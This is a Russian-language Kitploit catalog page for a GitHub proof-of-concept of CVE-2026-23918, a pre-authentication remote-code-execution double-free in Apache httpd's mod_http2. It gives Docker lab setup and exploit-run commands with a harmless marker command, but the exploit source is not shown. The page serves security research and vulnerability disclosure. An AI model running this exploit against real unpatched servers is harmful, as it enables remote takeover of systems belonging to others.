Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-23918 — Двойное освобождение памяти (double-free) при очистке потока в mod_http2 Apache httpd, приводящее к RCE до аутентификации. | Kitploit
Инструменты/GitHubGitHub/striga-ai/cve-2026-23918
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеЭксплуатация Бинарных Файлов
GitHubstriga-ai/cve-2026-23918

CVE-2026-23918

Двойное освобождение памяти (double-free) при очистке потока в mod_http2 Apache httpd, приводящее к RCE до аутентификации.

Репозиторий
31644 месяцев назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-23918

Double-free в очистке потока mod_http2 в Apache httpd, приводящий к RCE до аутентификации.

Затронуты: httpd 2.4.66 с mod_http2 и многопоточным MPM (event/worker). Исправлено в: 2.4.67.

Обнаружено и сообщено Bartlomiej Dmitruk (striga.ai) и Stanislaw Strzalkowski (isec.pl).

Writeup: https://striga.ai/research/apache-httpd-mod-http2-double-free

Требования

  • Docker
  • Python 3

Использование

Соберите и запустите уязвимое окружение:

root@kitploit:~
docker build -t httpd-poc .
docker run -d --name httpd-poc --privileged -p 9443:443 httpd-poc

Получите адреса system() и scoreboard:

root@kitploit:~
docker exec httpd-poc python3 /getaddr.py 1

Запустите эксплойт:

root@kitploit:~
python3 poc.py --host localhost --port 9443 \
    --cmd 'date >> /tmp/win' --workers 64 \
    --system <system_addr> --scoreboard <scoreboard_addr>

Проверьте (выполнение вероятностное, может занять от нескольких минут до нескольких часов):

root@kitploit:~
docker exec httpd-poc cat /tmp/win

Очистка

root@kitploit:~
docker rm -f httpd-poc
Скачать инструмент